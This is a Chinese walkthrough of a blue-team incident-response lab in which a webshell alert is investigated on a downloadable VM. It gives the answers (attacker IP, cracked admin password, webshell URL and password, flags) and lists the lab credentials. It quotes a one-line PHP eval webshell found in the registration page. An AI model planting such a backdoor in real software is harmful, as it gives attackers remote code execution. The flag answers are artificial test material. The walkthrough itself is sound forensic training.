记一次监测发现webshell告警的应急响应过程
看监控的时候发现webshell告警,领导让你上机检查你可以救救安服仔吗!!
这是他的服务器,请你找出以下内容作为通关条件:
1.提交攻击者IP
2.提交攻击者修改的管理员密码(明文)
3.提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)
4.提交Webshell连接密码
5.提交数据包的flag1
6.提交攻击者使用的后续上传的木马文件名称
7.提交攻击者隐藏的flag2
8.提交攻击者隐藏的flag3
靶场获取地址:
下载地址
https://pan.quark.cn/s/4b6dffd0c51a
关于靶机启动解压后双击ovf导入虚拟机打开即可。
相关账户密码:
root/Inch@957821.
注意:口令第一位是大写i
蓝队工具箱获取地址:
Github地址:
https://github.com/ChinaRan0/BlueTeamTools
蓝队工具箱v2024.7
https://pan.quark.cn/s/6d7856efd1d1
1.提交攻击者IP
直接上LinuxCheck脚本
https://github.com/al0ne/LinuxCheck
https://github.com/sun977/linuxcheckshoot
https://github.com/enomothem/Whoamifuck
攻击者IP:192.168.20.1
看一下应用系统
宝塔面板
修改面板密码
|-用户名: uysycv5w
|-新密码: 11qqMannix
BT-Panel default info!
===========================================
外网面板地址: https://211.145.20.131:12485/5a2ce72d
内网面板地址: https://192.168.11.8:12485/5a2ce72d
查看宝塔日志即可
用的net直接是网关
攻击者IP:192.168.20.1
2.提交攻击者修改的管理员密码(明文)
找到数据库账号密码
找到用户表
SELECT * FROM `x2_user`
md5哈希值
明文密码:Network@2020
3.提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)
登录后台后发现木马写在了注册协议,注册协议的路由为user-app-register
连接url:index.php?user-app-register
4.提交Webshell连接密码
namespace t;@eval($_POST['Network2020']);
连接密码:Network2020
分析数据包1
连接密码:x0b6b31b98f31d
5.提交数据包的flag1
flag1{Network@_2020_Hack}
6.提交攻击者使用的后续上传的木马文件名称
木马文件:version2.php
木马文件:go_build_untitled.exe
病毒文件:wp
7.提交攻击者隐藏的flag2
flag2 = "flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}"
8.提交攻击者隐藏的flag3
flag3=flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}
原文始发于微信公众号(利刃信安):【应急响应】记一次监测发现webshell告警的应急响应过程
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论